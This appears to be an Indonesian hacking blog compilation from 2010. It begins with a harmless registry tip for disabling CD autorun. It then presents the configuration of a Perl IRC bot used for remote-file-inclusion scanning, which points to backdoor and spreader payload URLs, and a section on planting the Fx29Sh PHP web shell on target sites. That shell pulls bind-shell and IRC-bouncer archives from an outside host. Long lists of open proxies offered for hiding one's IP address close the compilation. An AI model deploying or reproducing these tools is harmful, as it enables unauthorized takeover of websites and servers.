mungkin si pembuat cd bermaksud agar cd tersebut tidak dapat dicopy ulang atau dibajak lagi.
nah dari pengalaman tersebut saya menerapkan untuk mematikan fungsi autorun agar keamanan lebih terjaga.
oke itu sedikit cerita tentang autorun.
sekarang akan saya berikan cara untuk menonaktifkanya semoga bisa berguna bagi anda,karena selain antivirus cara ini sangat efektif untuk mencegah virus yang masuk.terkecuali virus yang dirinya mengkopi data kita
sehingga kita tidak sengaja mengklik data itu sehingga virus itu menyebar ketika kita klik.
untuk itu saya harap anda melihat besarnya data folder anda sebelum mengkliknya,karena folder virus kebanyakan hanya bernilai .kb dan jika anda perhatikan benar2 folder2 virus sangat berbeda bentuk dengan folder yg asli.
oke langsung aja
pertama siapkan kopi panas kalau yang suka dingin ya es kopi dech hehehe..
sabar brow jangan tegang..wakakak..

last..

1.masuk ke menu registry yaitu dengan cara Start>run>regedit ok

2.silahkan masuk ke sub key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CDRom.

3.Pada sub key CDRom tersebut klik gambar DWORD value bernama Autorun,isikan nilainya dengan angka 0.

4.restart komputer anda untuk merasakan perubahanya.

untuk mengembalikan seting ke kondisi semula anda dapat mengembalikan nilai autorun dengan nilai 1

bot perl auto scanner v666


#!/usr/bin/perl

print('
########################################
## IDC Scanner Bot v666 ##
## Autodomainscaner edited by Aryo ##
## © Oct 2010, LinkchaTcreW ##
########################################
');

use strict;

use IO::Socket::INET;
use LWP::UserAgent;
use HTTP::Request;

my $versi = "v666";
my $cmdpre = "!"; #Command Prefix

##[ KONFIGURASI URL ]##
my $fx29id = "http://tempatuploadmu.com/fx29id1.txt??"; #AKID (Simple)
my $fx29id2 = "http://http://tempatuploadmu.com/fx29id2.txt??"; #AKID (Advanced)
my $fx29sh = "http://http://tempatuploadmu.com/backdoor.txt??"; #Fx29Sh (Optional)
my $bypass = "/google.php"; #Google Bypasserz (Optional)
my $pbot = ""; #phpbot (Optional)
my $thebot = ""; #phpbot2 (Optional)
my $cbot = ""; #phpbot3 (Optional)
my $botscan = ""; #botscanloader (Optional)
my $botedan = ""; #botedanloader (Optional)

##[ KONFIGURASI SOURCE ]##
my $mysite = "http://uploadtanmu.com/"; #Path to Sources URL (Optional)
my $spread = $mysite."spread.txt??"; #FxSpreadz (Optional)
my $joomlaz = $mysite."joomla.txt"; #Joomla's Bugs List (Required for Joomla RFI Scanner)

##[ KONFIGURASI IRC ]##
my @servers = ("irc.linkchat.org");
my %bot = (
nick => "[aryo]LinkchatCreW[".int(rand(100))."]",
ident => "link".int(rand(100)),
chan => ["#jogjacodex"],
server => $servers[rand(scalar(@servers))],
port => "6667"
);

##[ KONFIGURASI USER ]##
## status: admin, user
## cryptz: 0 = Non-Encrypted Password, 1 = Encrypted Password
my %boss = (
admin => {
pass => 'passwordmu',
status => "admin",
cryptz => 0,
login => 0
},
admin => {
pass => 'passwordmu',
status => "admin",
cryptz => 0,
login => 0
},
);




Silahkan download file scannernya DI SINI.

cara memasang backdoor ditarget


salah satu contoh backdoor yang memungkinkan kita mengakses suatu server atau website secara penuh atau dinamakan shells,anggap saja sebagai jalan kita masuk atau proses setelah mendapatkan target.
hanya dengan kita upload ditempat target dan link urlnya
selamat berselancar didunia cyber

#######################################
## FaTaLisTiCz_Fx Fx29Sh 2.0.09.08 ##
## define('sh_ver',"2.0.09.08"); ##
## By aryo irc.linkchat.org ##
## © 2010 linkchat Community ##
## Written under PHP 5.2.5 ##
#######################################
$sh_name = sh_name(); ##
#######################################
#$sh_mainurl = "http://localhost/FX29SH/";
$sh_mainurl = "http://uaedesign.com/xml/";
$fx29sh_updateurl = $sh_mainurl."fx29sh_update.php";
$fx29sh_sourcesurl = $sh_mainurl."fx29sh.txt";
$sh_sourcez = array(
"Fx29Sh" => array($sh_mainurl."cyberz.txt","fx29sh.php"),
"psyBNC" => array($sh_mainurl."fx.tgz","fx.tgz"),
"Eggdrop" => array($sh_mainurl."fxb.tgz","fxb.tgz"),
"BindDoor" => array($sh_mainurl."bind.tgz","bind.tgz"),
);
##[ AUTHENTICATION ]##
$auth = array(
"login" => "",
"pass" => "",
"md5pass" => "",
"hostallow" => array("*"),
"denied" => "".$sh_name.": access denied!",



Silahkan download file backdornya DI SINI.

Proxy http,irc dan cara menggunakanya


proxy bisa disebut pengaman atau penutup ip kita,dimana kita bisa online dengan ip luar atau ip lain ,pertama berguna untuk mengamankan ip kita dari serangan dos atau ulah jail para hacker,kedua dapat juga memaksimalkan koneksi kalian tergantung dari proxy yg anda pilih atau proxy yang anda pakai.
cara pemasangan sangat mudah
bentar pagi2 puasa2 g boleh ngrokok enaknya sambil ndengerin musik dulu sambil berulah dengan ip baru kita wakakakkaka,oke to the point yah dah pagi nih minggu2 mau bersih2 kamar dulu yah
mozilla :
Tools -->advanced-->settings--->pilih manual proxy configuration lalu isi proxy yg kamu ingin
Mirc:
icon option-->conect-->firewall-->kotak firewal support ganti "server" lalu isi dengan proxy yg kalian mau
oke dibawah ini list proxy terbaru silahkan pilih diantaranya yg kalian suka :)
<------------------------------->

High Anonymous HTTP Proxy list
# Host Port Checked Added
1 193.136.191.26 3128 2010-08-22 02:54:15 2010-08-20 17:59:02
2 117.79.82.133 8080 2010-08-22 02:48:02 2010-08-21 00:40:02
3 200.46.3.125 3128 2010-08-22 02:45:23 2010-05-08 11:44:09
4 119.70.40.101 8080 2010-08-22 02:19:16 2010-08-14 11:20:06
5 72.52.65.4 3128 2010-08-22 01:58:04 2010-06-26 07:47:03
6 92.247.12.242 8080 2010-08-22 01:57:07 2010-06-04 11:03:40
7 61.135.149.177 8888 2010-08-22 01:57:05 2010-08-22 01:57:05
8 174.142.24.201 3128 2010-08-22 01:57:05 2010-08-22 01:57:05
9 194.63.140.165 8080 2010-08-22 01:56:04 2010-08-22 01:56:04
10 129.69.210.96 3124 2010-08-22 01:56:04 2010-08-21 16:20:02
11 217.29.30.20 8080 2010-08-22 01:55:07 2010-03-28 09:29:25
12 151.100.59.11 3128 2010-08-22 01:54:02 2010-08-18 21:27:01
13 202.75.232.77 444 2010-08-22 01:53:01 2010-04-12 17:16:02
14 109.230.209.186 8080 2010-08-22 01:52:10 2010-08-22 01:52:10
15 85.105.35.142 8080 2010-08-22 01:52:09 2010-03-28 14:39:08
16 218.76.73.33 8081 2010-08-22 01:52:08 2009-11-17 14:34:02
17 66.195.233.149 444 2010-08-22 01:52:08 2010-08-22 01:52:08
18 203.186.108.130 65208 2010-08-22 01:52:08 2010-08-22 01:52:08
19 120.89.55.19 3128 2010-08-22 01:52:07 2010-08-04 12:32:21
20 125.40.85.96 3128 2010-08-22 01:52:06 2010-06-24 07:56:06
21 88.53.107.156 8000 2010-08-22 01:52:06 2010-08-17 08:59:07
22 218.75.75.133 8080 2010-08-22 01:52:05 2010-07-27 17:30:09
23 93.62.4.207 9000 2010-08-22 01:52:05 2010-07-27 19:07:15
24 218.29.234.50 3128 2010-08-22 01:52:04 2010-05-26 12:11:01
25 124.193.97.54 3128 2010-08-22 01:52:04 2010-06-21 11:25:05
26 93.152.146.220 8888 2010-08-22 01:52:04 2010-08-22 01:52:04
27 183.90.187.96 8080 2010-08-22 01:52:03 2010-08-20 15:06:05
28 222.47.26.12 8888 2010-08-22 01:52:02 2010-08-12 17:30:40
29 87.110.149.190 8000 2010-08-22 01:47:14 2010-08-22 01:47:14
30 211.144.20.13 8080 2010-08-22 01:25:05 2010-08-21 22:12:08
31 203.178.133.2 3124 2010-08-22 01:24:06 2010-08-22 01:24:06
32 131.247.2.247 3124 2010-08-22 01:23:05 2010-08-22 01:23:05
33 169.226.40.2 3124 2010-08-22 01:21:04 2010-08-22 01:21:04
34 123.203.186.143 9000 2010-08-22 00:57:01 2010-08-22 00:57:01
35 59.7.91.227 8080 2010-08-22 00:52:19 2010-07-16 14:53:01
36 125.128.25.151 19671 2010-08-22 00:48:01 2010-08-22 00:48:01
37 75.101.208.131 8118 2010-08-22 00:43:02 2010-08-22 00:43:02
38 75.186.47.138 9090 2010-08-22 00:42:03 2010-08-21 05:16:01
39 68.1.131.233 9090 2010-08-22 00:42:02 2010-06-14 00:44:02
40 85.228.181.165 8080 2010-08-22 00:40:19 2010-08-22 00:40:19
41 219.142.62.13 8080 2010-08-22 00:40:18 2010-08-21 21:12:02
42 71.235.209.187 8080 2010-08-22 00:40:17 2010-08-22 00:40:17
43 122.70.150.12 8000 2010-08-22 00:39:07 2010-06-08 21:33:01
44 166.70.179.252 8000 2010-08-22 00:39:07 2010-08-22 00:39:07
45 156.17.10.52 3124 2010-08-22 00:38:01 2010-08-22 00:38:01
46 81.95.157.178 3128 2010-08-22 00:37:31 2009-12-23 18:07:01
47 193.84.77.90 3128 2010-08-22 00:37:27 2010-07-07 00:09:02
48 195.131.117.44 3128 2010-08-22 00:37:21 2010-08-22 00:37:21
49 212.45.5.172 3128 2010-08-22 00:37:16 2009-12-25 07:26:02
50 212.75.219.98 3128 2010-08-22 00:37:14 2010-06-26 10:21:01
51 193.147.162.166 3124 2010-08-22 00:36:23 2010-08-22 00:36:23
52 219.233.196.8 808 2010-08-22 00:34:04 2010-07-14 18:06:08
53 218.204.29.110 808 2010-08-22 00:34:04 2010-08-22 00:34:04
54 195.159.93.143 443 2010-08-22 00:34:03 2010-08-22 00:34:03
55 210.82.57.79 8080 2010-08-22 00:16:25 2010-08-22 00:16:25
56 97.81.241.109 9090 2010-08-22 00:16:22 2010-08-19 16:31:04
57 121.11.158.158 808 2010-08-22 00:16:20 2010-08-22 00:16:20
58 129.105.15.37 3124 2010-08-22 00:10:03 2010-08-22 00:10:03
59 128.112.139.29 3124 2010-08-22 00:10:02 2010-08-22 00:10:02
60 192.42.43.23 3124 2010-08-22 00:07:02 2010-08-22 00:07:02
61 61.89.162.88 8080 2010-08-22 00:06:09 2009-12-26 19:13:01
62 222.122.197.23 3128 2010-08-21 23:55:12 2010-08-21 23:55:12
63 pub2-s.ane.cmc.osaka-u.ac.jp 3128 2010-08-21 23:54:15 2010-08-21 23:54:15
64 151.100.59.10 3128 2010-08-21 23:26:02 2010-08-21 23:26:02
65 65.25.184.195 9000 2010-08-21 23:26:01 2010-07-26 08:12:06
66 66.178.117.75 3128 2010-08-21 23:11:07 2010-07-12 13:03:05
67 194.117.20.215 3128 2010-08-21 23:10:03 2010-08-21 23:10:03
68 219.136.240.84 8080 2010-08-21 22:55:02 2010-08-21 22:55:02
69 213.30.141.195 8080 2010-08-21 22:55:01 2010-08-21 22:55:01
70 86.7.9.116 9090 2010-08-21 22:45:15 2010-03-21 19:31:01
71 98.192.23.153 7212 2010-08-21 22:39:14 2010-08-20 05:57:03
72 201.232.27.204 3128 2010-08-21 22:31:05 2010-08-21 22:31:05
73 76.121.94.213 8000 2010-08-21 22:26:05 2010-06-04 01:54:01
74 113.253.192.239 9000 2010-08-21 22:24:02 2010-08-21 22:24:02
75 207.180.144.65 3128 2010-08-21 22:22:08 2010-08-21 22:22:08
76 195.158.22.6 8080 2010-08-21 22:16:05 2010-06-01 09:56:01
77 117.103.174.66 8080 2010-08-21 22:13:07 2010-08-21 22:13:07
78 rpix.realprogrammers.com 3128 2010-08-21 22:09:07 2010-06-12 09:33:05
79 132.239.17.226 3128 2010-08-21 21:48:01 2010-08-21 21:48:01
80 137.99.11.86 3128 2010-08-21 21:48:01 2010-08-21 21:48:01
81 80.241.245.106 808 2010-08-21 21:36:01 2010-08-21 21:36:01
82 195.34.227.139 3128 2010-08-21 21:30:07 2010-08-21 21:30:07
83 151.100.59.10 3124 2010-08-21 21:24:11 2010-08-21 21:24:11
84 142.150.3.78 3128 2010-08-21 21:24:06 2010-08-21 21:24:06
85 219.58.72.191 8080 2010-08-21 21:24:04 2009-11-15 07:00:01
86 121.52.211.217 808 2010-08-21 21:24:01 2010-08-21 21:24:01
87 61.213.197.107 444 2010-08-21 21:11:22 2010-08-21 21:11:22
88 190.146.127.152 444 2010-08-21 21:04:01 2010-08-21 21:04:01
89 78.108.178.135 57957 2010-08-21 21:01:03 2010-08-21 21:01:03
90 64.34.172.107 8118 2010-08-21 21:00:07 2010-08-21 21:00:07
91 210.158.6.201 8080 2010-08-21 20:04:11 2009-11-14 01:48:01
92 62.122.104.18 3128 2010-08-21 20:04:08 2010-08-09 10:17:01
93 61.89.81.134 8080 2010-08-21 19:50:08 2010-07-26 18:53:01
94 221.250.248.165 8080 2010-08-21 19:14:01 2010-08-21 19:14:01
95 81.213.198.51 8088 2010-08-21 19:11:11 2010-08-21 19:11:11
96 78.108.181.128 59821 2010-08-21 19:10:25 2010-08-21 19:10:25
97 219.4.224.120 8080 2010-08-21 19:03:18 2009-12-03 14:56:01
98 88.250.166.104 8088 2010-08-21 18:57:01 2010-08-21 18:57:01
99 78.108.179.92 50877 2010-08-21 18:56:03 2010-08-21 18:56:03
100 203.180.79.64 8080 2010-08-21 18:54:24 2009-11-19 20:02:01
text version

Transparent and anonymous HTTP Proxy list
# Host Port Checked Added
1 61.244.235.34 3128 2010-08-22 02:58:01 2010-06-15 09:18:09
2 67.23.221.98 3128 2010-08-22 02:57:01 2010-08-17 00:31:05
3 88.43.145.11 8080 2010-08-22 02:57:01 2010-08-17 08:59:08
4 66.78.105.2 8080 2010-08-22 02:54:17 2010-08-17 09:04:05
5 61.247.50.224 3128 2010-08-22 02:54:15 2010-05-26 22:32:01
6 217.65.6.10 3128 2010-08-22 02:54:13 2010-05-07 11:23:02
7 210.5.71.130 8080 2010-08-22 02:54:12 2009-11-18 03:46:02
8 140.116.247.7 3128 2010-08-22 02:54:10 2010-08-17 09:07:05
9 211.23.82.90 3128 2010-08-22 02:54:07 2010-06-18 23:42:07
10 187.6.51.234 3128 2010-08-22 02:54:07 2010-08-20 09:45:06
11 41.190.16.17 8080 2010-08-22 02:54:05 2010-04-30 23:58:01
12 92.46.32.150 3128 2010-08-22 02:54:05 2010-08-20 04:49:04
13 202.71.98.201 3128 2010-08-22 02:54:04 2010-05-27 17:49:11
14 201.16.171.53 3128 2010-08-22 02:54:03 2009-11-14 11:09:01
15 188.40.91.2 3128 2010-08-22 02:54:03 2010-06-03 23:04:02
16 189.108.24.18 3128 2010-08-22 02:54:03 2010-08-13 09:18:17
17 186.3.1.190 8080 2010-08-22 02:54:02 2010-05-24 02:08:11
18 195.5.132.91 3128 2010-08-22 02:54:01 2010-08-21 13:56:03
19 81.169.170.94 3128 2010-08-22 02:54:01 2010-08-21 13:57:10
20 202.93.213.34 3128 2010-08-22 02:49:03 2010-05-02 06:54:03
21 212.9.224.188 3128 2010-08-22 02:49:02 2010-08-16 23:14:02
22 80.48.253.61 8080 2010-08-22 02:49:01 2010-07-16 17:46:11
23 200.74.158.86 8080 2010-08-22 02:48:04 2009-11-19 19:08:02
24 84.22.2.25 3128 2010-08-22 02:48:03 2010-08-07 13:51:05
25 74.206.98.202 8080 2010-08-22 02:47:01 2009-11-13 22:34:01
26 189.1.179.89 3128 2010-08-22 02:47:01 2010-08-17 05:53:05
27 94.89.79.19 3128 2010-08-22 02:46:02 2009-12-14 12:39:02
28 78.133.214.54 3128 2010-08-22 02:46:02 2010-05-21 13:51:02
29 222.177.4.99 8080 2010-08-22 02:46:01 2010-04-15 09:23:17
30 12.35.110.235 3128 2010-08-22 02:46:01 2010-07-11 01:34:02
31 189.56.100.42 3128 2010-08-22 02:45:27 2009-11-13 21:01:01
32 75.151.151.49 8000 2010-08-22 02:40:06 2010-03-20 20:19:04
33 200.254.95.22 3128 2010-08-22 02:40:04 2010-06-04 10:59:05
34 189.17.100.2 3128 2010-08-22 02:39:07 2010-04-02 23:00:20
35 200.52.176.55 3128 2010-08-22 02:37:15 2010-03-13 00:19:12
36 217.10.246.2 8080 2010-08-22 02:31:01 2010-07-08 12:46:22
37 82.119.76.151 3128 2010-08-22 02:31:01 2010-08-17 18:37:01
38 141.16.81.2 8080 2010-08-22 02:21:14 2010-08-17 19:10:03
39 58.68.56.23 3128 2010-08-22 02:20:09 2010-02-28 01:38:14
40 12.4.27.18 8000 2010-08-22 02:20:08 2009-11-19 23:59:01
41 66.219.22.10 3128 2010-08-22 02:19:04 2010-08-10 12:54:01
42 201.65.220.84 3128 2010-08-22 02:01:01 2010-05-15 22:07:01
43 218.208.56.13 3128 2010-08-22 02:00:13 2010-05-17 23:58:39
44 202.150.74.44 3128 2010-08-22 01:59:13 2010-05-02 17:31:01
45 mailserver.belsys.com.br 3129 2010-08-22 01:59:13 2010-08-22 01:59:13
46 200.48.170.215 3128 2010-08-22 01:59:07 2010-08-22 01:59:07
47 118.175.22.19 8080 2010-08-22 01:59:06 2010-07-15 05:46:15
48 110.164.211.98 3128 2010-08-22 01:59:06 2010-08-22 01:59:06
49 mail.cwsj.edu.hk 8080 2010-08-22 01:59:06 2010-08-22 01:59:06
50 61.164.40.37 3128 2010-08-22 01:59:05 2009-11-14 08:55:01
51 ip-174-142-124-113.static.privatedns.com 3128 2010-08-22 01:59:05 2010-08-22 01:59:05
52 200.143.204.3 3128 2010-08-22 01:59:05 2010-07-29 13:21:11
53 usd.lanta-net.ru 8080 2010-08-22 01:59:04 2010-05-29 12:55:18
54 220.225.219.165 8080 2010-08-22 01:59:04 2010-08-22 01:59:04
55 201.38.240.167 3128 2010-08-22 01:58:14 2010-08-22 01:58:14
56 www.career.teilar.gr 8080 2010-08-22 01:58:13 2010-06-01 04:40:14
57 222.165.130.82 3128 2010-08-22 01:58:12 2010-08-22 01:58:12
58 82.150.165.146 8080 2010-08-22 01:57:07 2010-08-22 01:57:07
59 187.105.9.155 8080 2010-08-22 01:57:07 2010-08-18 21:20:08
60 183.91.74.194 8080 2010-08-22 01:57:03 2010-08-14 11:20:13
61 80.233.223.59 8080 2010-08-22 01:57:03 2010-08-18 21:43:06
62 195.42.115.123 3128 2010-08-22 01:56:04 2010-08-22 01:56:04
63 60.248.227.175 3128 2010-08-22 01:56:03 2010-08-22 01:56:03
64 200.195.38.98 8080 2010-08-22 01:56:01 2010-05-26 00:25:59
65 91.189.182.2 3128 2010-08-22 01:55:09 2010-05-21 13:51:03
66 213.151.33.58 3128 2010-08-22 01:55:07 2010-07-17 00:10:04
67 61.79.87.93 3128 2010-08-22 01:55:06 2009-11-13 22:36:01
68 195.168.109.60 8080 2010-08-22 01:54:16 2010-08-22 01:54:16
69 201.88.202.10 8080 2010-08-22 01:54:15 2010-08-22 00:16:08
70 195.182.220.1 3128 2010-08-22 01:54:14 2010-07-06 16:35:01
71 173.201.183.172 8080 2010-08-22 01:54:14 2010-08-22 01:54:14
72 218.248.44.216 8080 2010-08-22 01:53:01 2010-08-22 01:53:01
73 190.94.40.147 8080 2010-08-22 01:52:09 2010-08-22 01:52:09
74 201.0.208.56 3128 2010-08-22 01:51:02 2010-08-03 08:31:01
75 189.17.16.130 3128 2010-08-22 01:50:16 2010-06-04 11:05:01
76 59.120.5.235 3128 2010-08-22 01:50:14 2010-07-20 10:56:14
77 75.77.191.81 8080 2010-08-22 01:50:13 2010-08-17 09:05:01
78 67.91.99.68 3128 2010-08-22 01:50:13 2010-08-21 18:56:30
79 82.151.74.124 8080 2010-08-22 01:50:11 2010-05-02 15:00:10
80 202.175.58.52 8080 2010-08-22 01:50:11 2010-07-24 04:44:03
81 60.251.54.208 3128 2010-08-22 01:50:09 2009-11-13 22:49:01
82 72.51.41.235 3128 2010-08-22 01:50:09 2010-04-29 20:52:06
83 65.255.80.240 8080 2010-08-22 01:50:08 2010-08-13 09:20:20
84 67.99.190.246 3128 2010-08-22 01:50:07 2010-07-16 10:56:14
85 77.246.23.20 8080 2010-08-22 01:50:07 2010-08-17 09:05:02
86 123.49.32.232 8080 2010-08-22 01:49:09 2010-08-11 11:59:14
87 217.65.6.12 3128 2010-08-22 01:49:08 2010-05-02 16:55:09
88 221.0.181.203 3128 2010-08-22 01:49:08 2010-08-03 09:17:01
89 189.84.124.34 3128 2010-08-22 01:49:07 2010-06-13 08:39:01
90 189.205.27.68 8080 2010-08-22 01:49:07 2010-06-30 00:15:27
91 58.64.138.56 3128 2010-08-22 01:49:06 2010-07-23 11:06:03
92 200.163.74.55 8080 2010-08-22 01:49:05 2010-08-11 02:14:02
93 190.24.142.12 8080 2010-08-22 01:49:04 2010-07-08 03:55:02
94 79.98.31.241 3128 2010-08-22 01:49:04 2010-08-08 05:57:16
95 78.7.97.45 8080 2010-08-22 01:49:03 2010-08-21 18:59:01
96 80.81.159.20 8080 2010-08-22 01:49:02 2009-12-10 02:57:04
97 219.80.4.150 3128 2010-08-22 01:49:01 2010-02-02 11:48:02
98 200.195.132.27 8080 2010-08-22 01:42:10 2010-08-22 01:42:10
99 193.255.184.210 3128 2010-08-22 01:42:06 2010-08-22 01:42:06
100 193.87.173.106 8080 2010-08-22 01:40:03 2010-08-22 01:40:03


# Host Port Checked Added
1 221.11.35.175 1080 2010-08-22 02:54:09 2010-06-25 04:48:02
2 59.108.53.252 1080 2010-08-22 02:54:08 2010-08-21 16:52:02
3 218.1.118.122 1080 2010-08-22 02:54:05 2010-04-02 18:57:04
4 220.178.41.50 1080 2010-08-22 02:19:09 2010-03-12 12:48:45
5 195.117.61.6 1080 2010-08-22 02:14:03 2010-07-13 18:48:29
6 220.189.227.2 1080 2010-08-22 01:57:03 2009-11-13 21:16:01
7 121.12.249.207 1080 2010-08-22 01:57:03 2010-08-22 01:57:03
8 121.17.40.95 1080 2010-08-22 00:37:16 2010-07-22 10:16:11
9 201.219.133.20 1080 2010-08-22 00:36:19 2010-08-22 00:36:19
10 201.45.142.178 1080 2010-08-22 00:36:18 2010-08-22 00:36:18
11 64.34.172.46 1080 2010-08-22 00:36:17 2010-05-17 16:32:02
12 187.4.205.153 1080 2010-08-22 00:36:17 2010-02-20 01:54:02
13 121.32.89.4 1080 2010-08-22 00:36:17 2010-08-12 15:50:09
14 190.220.145.154 1080 2010-08-22 00:36:17 2010-08-22 00:36:17
15 196.219.125.66 1080 2010-08-22 00:36:17 2010-08-22 00:36:17
16 124.207.99.61 1080 2010-08-22 00:36:17 2009-11-14 01:00:01
17 219.238.150.190 1080 2010-08-22 00:36:15 2010-08-22 00:36:15
18 218.249.93.78 1080 2010-08-22 00:36:14 2010-08-09 13:53:18
19 210.28.96.53 1080 2010-08-22 00:36:13 2010-02-13 09:57:01
20 203.113.101.183 1080 2010-08-22 00:36:12 2010-08-22 00:36:12
21 213.192.3.66 1080 2010-08-22 00:36:12 2010-06-02 08:43:07
22 218.6.79.138 1080 2010-08-22 00:36:11 2010-07-10 15:29:04
23 218.9.124.253 1080 2010-08-22 00:36:11 2010-08-02 09:35:09
24 220.163.226.105 1080 2010-08-22 00:36:11 2010-08-22 00:36:11
25 187.16.58.9 1080 2010-08-22 00:36:10 2010-03-16 03:56:09
26 210.212.229.199 1080 2010-08-22 00:36:10 2010-08-22 00:36:10
27 62.243.224.179 1080 2010-08-22 00:36:09 2010-08-22 00:36:09
28 219.139.35.67 1080 2010-08-22 00:36:09 2010-04-16 01:44:01
29 202.102.44.120 1080 2010-08-22 00:36:09 2010-08-22 00:36:09
30 203.93.208.227 1080 2010-08-22 00:36:09 2010-08-22 00:36:09
31 218.31.134.111 1080 2010-08-22 00:36:09 2010-08-22 00:36:09
32 119.115.136.150 1080 2010-08-22 00:36:09 2010-08-22 00:36:09
33 222.77.187.134 1080 2010-08-22 00:36:09 2010-08-22 00:36:09
34 195.117.121.2 1080 2010-08-22 00:36:08 2010-07-05 21:01:14
35 219.85.221.130 1080 2010-08-22 00:36:08 2010-08-22 00:36:08
36 130.160.86.87 1080 2010-08-22 00:36:07 2010-08-15 17:19:03
37 60.10.58.45 1080 2010-08-22 00:36:07 2010-03-04 14:24:11
38 221.12.88.188 1080 2010-08-22 00:36:06 2010-08-11 07:44:02
39 41.234.202.96 1080 2010-08-22 00:36:06 2010-08-21 16:59:01
40 195.117.61.210 1080 2010-08-22 00:36:06 2010-07-09 10:58:05
41 61.142.213.158 1080 2010-08-22 00:36:05 2010-08-22 00:36:05
42 222.168.18.227 1080 2010-08-22 00:36:05 2010-08-22 00:36:05
43 89.120.234.232 1080 2010-08-22 00:36:04 2010-08-22 00:36:04
44 80.167.238.78 1080 2010-08-22 00:36:02 2009-11-19 11:00:01
45 121.8.124.42 1080 2010-08-22 00:36:01 2009-11-13 21:06:01
46 222.188.10.1 1080 2010-08-22 00:35:07 2010-08-22 00:35:07
47 218.90.179.241 1080 2010-08-21 23:39:01 2010-08-21 23:39:01
48 218.25.111.158 1080 2010-08-21 23:34:01 2010-08-21 23:34:01
49 200.35.34.226 1080 2010-08-21 23:25:02 2010-08-21 23:25:02
50 219.136.191.218 1080 2010-08-21 23:25:02 2010-08-21 23:25:02
51 218.241.238.141 1080 2010-08-21 23:24:04 2010-08-21 23:24:04
52 61.134.63.102 1080 2010-08-21 23:21:04 2010-07-18 00:44:04
53 202.57.10.38 1080 2010-08-21 23:20:06 2009-11-13 21:33:01
54 200.81.26.103 1080 2010-08-21 23:19:01 2010-06-04 14:43:02
55 218.201.17.111 1080 2010-08-21 23:17:02 2010-08-21 23:17:02
56 195.205.171.48 1080 2010-08-21 23:13:01 2010-08-21 23:13:01
57 112.64.180.114 1080 2010-08-21 23:12:01 2010-08-21 23:12:01
58 121.22.20.202 1080 2010-08-21 22:45:09 2010-08-21 22:45:09
59 83.250.174.34 1080 2010-08-21 22:37:01 2010-08-21 22:37:01
60 41.234.207.73 1080 2010-08-21 22:36:01 2010-08-21 22:36:01
61 202.196.103.80 1080 2010-08-21 22:30:10 2010-08-21 22:30:10
62 82.145.240.37 1080 2010-08-21 22:18:03 2009-11-14 01:05:01
63 195.117.61.132 1080 2010-08-21 22:18:03 2010-08-21 22:18:03
64 trum2005.vpn.mgn.ru 1080 2010-08-21 20:32:09 2010-08-21 20:32:09
65 94.127.136.61 1080 2010-08-21 20:31:15 2010-05-26 11:49:04
66 61.154.243.68 1080 2010-08-21 20:31:14 2010-04-18 11:27:02
67 222.173.54.196 1080 2010-08-21 20:31:09 2010-08-21 20:31:09
68 92.114.162.13 1080 2010-08-21 20:31:09 2009-12-23 15:46:05
69 221.2.144.135 1080 2010-08-21 20:31:08 2009-11-14 01:03:01
70 112.91.145.78 1080 2010-08-21 20:31:04 2009-11-14 00:58:01
71 219.157.200.19 1080 2010-08-21 20:31:04 2010-08-21 20:31:04
72 201.12.130.83 1080 2010-08-21 20:31:01 2010-08-06 12:27:14
73 212.39.125.66 1080 2010-08-21 20:31:01 2010-08-21 13:56:02
74 195.117.61.242 1080 2010-08-21 18:44:07 2010-08-21 18:44:07
75 211.83.96.2 1080 2010-08-21 17:00:06 2010-08-13 13:01:16
76 93.152.136.96 1080 2010-08-21 16:55:11 2009-11-22 02:25:02
77 41.234.205.112 1080 2010-08-21 16:51:09 2010-08-21 16:51:09
78 123.237.12.118 1080 2010-08-21 16:49:05 2010-08-21 16:49:05
79 12.238.228.2 1080 2010-08-21 16:49:02 2010-08-18 15:06:06
80 115.108.144.162 1080 2010-08-21 16:49:02 2010-08-21 16:49:02
81 218.25.111.238 1080 2010-08-21 16:35:04 2010-08-21 16:35:04
82 222.74.200.2 1080 2010-08-21 16:34:22 2009-11-13 22:32:01
83 210.212.214.184 1080 2010-08-21 16:04:01 2010-08-21 16:04:01
84 58.214.5.162 1080 2010-08-21 15:42:02 2010-08-05 10:43:09
85 219.150.227.111 1080 2010-08-21 15:40:02 2010-08-21 15:40:02
86 122.5.180.178 1080 2010-08-21 14:42:02 2010-08-21 03:20:02
87 203.163.239.168 1080 2010-08-21 14:41:31 2010-08-21 14:41:31
88 195.69.109.226 1080 2010-08-21 14:30:44 2010-08-21 14:30:44
89 196.41.105.30 1080 2010-08-21 14:30:37 2010-07-26 14:02:07
90 61.177.134.113 1080 2010-08-21 13:43:02 2010-08-21 13:43:02
91 123.13.206.59 1080 2010-08-21 11:02:04 2010-03-08 21:35:02
92 220.199.6.54 1080 2010-08-21 11:02:03 2009-12-09 12:41:01
93 59.90.134.144 1080 2010-08-21 11:02:01 2010-08-09 13:55:12
94 218.61.202.66 1080 2010-08-21 09:08:01 2010-08-20 22:11:03
95 190.98.32.175 1080 2010-08-21 09:04:01 2010-08-17 17:17:03
96 195.117.61.4 1080 2010-08-21 07:12:01 2010-06-22 08:23:02
97 124.75.29.75 1080 2010-08-21 01:26:04 2010-06-05 07:00:03
98 190.182.69.78 1080 2010-08-20 22:37:15 2010-05-26 23:09:03
99 222.197.172.234 1080 2010-08-20 22:37:13 2010-08-20 22:37:13
100 119.6.253.70 1080 2010-08-20 22:37:13 2010-04-21 21:41:18
text version

SOCKS5 Proxy list
# Host Port Checked Added
1 59.41.186.67 1080 2010-08-22 02:50:07 2010-07-05 14:28:13
2 60.191.129.2 1080 2010-08-22 02:50:07 2010-08-20 22:13:02
3 115.182.0.6 1080 2010-08-22 02:50:05 2010-05-05 10:07:05
4 221.12.147.80 1080 2010-08-22 02:50:05 2010-08-20 10:25:02
5 116.55.58.3 1080 2010-08-22 02:50:04 2010-06-08 14:36:03
6 220.128.74.24 1080 2010-08-22 02:04:02 2010-08-13 13:01:20
7 221.2.204.50 1080 2010-08-22 02:00:12 2010-05-09 13:29:03
8 190.9.180.74 1080 2010-08-22 02:00:11 2010-06-08 19:30:11
9 120.88.10.172 1080 2010-08-22 02:00:09 2010-06-09 08:28:08
10 202.91.245.109 1080 2010-08-22 00:36:19 2010-08-22 00:36:19
11 218.6.144.217 1080 2010-08-21 23:34:01 2009-11-15 14:24:01
12 202.114.20.85 1080 2010-08-21 23:25:02 2009-11-28 21:20:02
13 218.6.144.218 1080 2010-08-21 22:32:02 2009-11-13 21:51:01
14 67.19.148.68 1080 2010-08-21 20:31:11 2010-08-13 13:02:02
15 221.136.86.252 1080 2010-08-21 16:52:02 2010-08-21 16:52:02
